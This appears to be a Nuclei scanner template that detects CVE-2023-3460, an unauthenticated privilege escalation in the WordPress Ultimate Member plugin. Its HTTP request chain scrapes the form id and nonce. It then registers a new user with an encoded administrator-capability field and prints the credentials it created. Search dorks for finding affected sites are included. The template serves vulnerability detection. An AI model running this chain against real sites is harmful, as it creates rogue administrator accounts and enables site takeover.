id: CVE-2023-3460 info: name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation author: DhiyaneshDk severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. remediation: | Upgrade to Ultimate Member version 2.6.7 or later. reference: - https://github.com/gbrsh/CVE-2023-3460 - https://nvd.nist.gov/vuln/detail/CVE-2023-3460 - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7 - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/ - https://wordpress.org/plugins/ultimate-member/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 epss-score: 0.1602 epss-percentile: 0.95367 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: ultimatemember product: ultimate_member framework: wordpress publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /index.php/register/?{{version}} HTTP/1.1 Host: {{Hostname}} - | GET {{path}} HTTP/1.1 Host: {{Hostname}} - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1 matchers: - type: dsl dsl: - contains(to_lower(body_1), "ultimate member") - regex("wordpress_logged_in_[a-z0-9]{32}", header_4) - status_code_4 == 302 condition: and extractors: - type: regex name: path part: location_2 group: 1 regex: - '([a-z:/.]+)' internal: true - type: regex name: version part: body_1 group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' internal: true - type: regex name: formid part: body_3 group: 1 regex: - 'name="form_id" id="form_id_([0-9]+)"' internal: true - type: regex name: wpnonce part: body_3 group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)"' internal: true - type: dsl dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' # digest: 4a0a00473045022100e3b71b8d0fdf0fff71bfe0572e229414f401496fe3c8c2b5e599204d4d9508d40220643b62e84e9772da84aa22d11ac196006809b4bdf1de9ce9fdcd52757f1ffb09:922c64590222798bb761d5b6d8e72950